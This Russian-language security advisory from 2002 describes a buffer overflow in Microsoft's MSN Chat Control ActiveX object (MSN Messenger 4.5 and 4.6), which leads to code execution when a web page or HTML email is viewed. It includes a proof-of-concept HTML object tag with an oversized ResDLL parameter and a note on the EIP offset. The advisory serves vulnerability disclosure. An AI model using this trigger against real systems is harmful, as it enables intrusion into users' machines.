Выполнение произвольного кода в Microsoft MSN Messenger

Дата публикации:
13.05.2002
Всего просмотров:
879
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Microsoft MSN Chat Control - ActiveX объект, обеспечивающий функциональные возможности чата. Объект поставляется по умолчанию со многими продуктами Microsoft, включая последние версии MSN Messenger.

Microsoft MSN Chat Control уязвим к переполнению буфера и выполнению произвольного кода. Эта уязвимость может эксплуатироваться при просмотре Web страницы или HTML электронного сообщения.

Пример:

object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"
height="523">
<param name="_cx" value="12039">
<param name="_cy" value="13838">
<param name="BackColor" value="50331647">
<param name="ForeColor" value="43594547">
<param name="RedirectURL" value="">
<param name="ResDLL" value="AAAAAAA[27,257 bytes is where the EIP starts]">
</object>

Уязвимость обнаружена в Microsoft MSN Chat Control (Microsoft MSN Messenger 4.5 and 4.6)
 



Ссылки: ADVISORY: MSN Messenger OCX Buffer Overflow
или введите имя

CAPTCHA